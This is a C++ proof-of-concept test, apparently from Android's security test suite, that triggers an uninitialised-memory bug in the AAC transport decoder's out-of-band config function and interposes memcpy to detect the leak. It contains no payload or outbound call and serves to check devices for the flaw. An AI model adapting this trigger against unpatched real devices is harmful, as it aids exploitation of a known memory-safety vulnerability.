/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <iostream>
#include <unistd.h>
#include <dlfcn.h>
#include <common.h>

#include "tpdec_lib.h"

#define STACK_SIZE 16384
#define SIZE_OF_VULNERABLE_MEMORY 1024
#define TRANSPORTDEC_SIZE 5776
#define INITIAL_VAL 0xBE
#define TIMEOUT_IN_SECONDS 540

const UINT length = 200;
UCHAR conf[length] = { 0 };
UINT layer = 0;
bool isVulnerable = false;
bool isPocExecutionComplete = false;

static void* (*real_memcpy)(void*, const void*, size_t) = nullptr;
static bool s_memory_copy_initialized = false;

int poc(void *sTp) {
    transportDec_OutOfBandConfig((struct TRANSPORTDEC *) sTp, conf, length,
                                 layer);
    isPocExecutionComplete = true;
    return EXIT_SUCCESS;
}

void memory_copy_init(void) {
    real_memcpy = (void *(*)(void *, const void *,
                             size_t))dlsym(RTLD_NEXT, "memcpy");
    if (!real_memcpy) {
        return;
    }
    s_memory_copy_initialized = true;
}

void* memcpy(void* destination, const void* source, size_t num) {
    if (!s_memory_copy_initialized) {
        memory_copy_init();
    }
    if (num == length) {
        char *tmp_destination = (char*) destination;
        for (int i = 0; i < SIZE_OF_VULNERABLE_MEMORY; ++i) {
            if (tmp_destination[i] == INITIAL_VAL) {
                isVulnerable = true;
                break;
            }
        }
    }
    return real_memcpy(destination, source, num);
}

int main() {
    void *sTp = malloc(TRANSPORTDEC_SIZE);
    if (!sTp) {
        return EXIT_FAILURE;
    }
    char *ptr = (char *) malloc(STACK_SIZE);
    if (!ptr) {
        free(sTp);
        return EXIT_FAILURE;
    }
    memset(sTp, 0x00, TRANSPORTDEC_SIZE);
    memset(ptr, INITIAL_VAL, STACK_SIZE);
    clone(&poc, ptr + STACK_SIZE, CLONE_VM, sTp);
    int sleepCounter = 0;
    while (!isPocExecutionComplete) {
        if (sleepCounter == TIMEOUT_IN_SECONDS) {
            break;
        }
        sleep(1);
        ++sleepCounter;
    }
    free(ptr);
    free(sTp);
    return (isVulnerable ? EXIT_VULNERABLE : EXIT_SUCCESS);
}
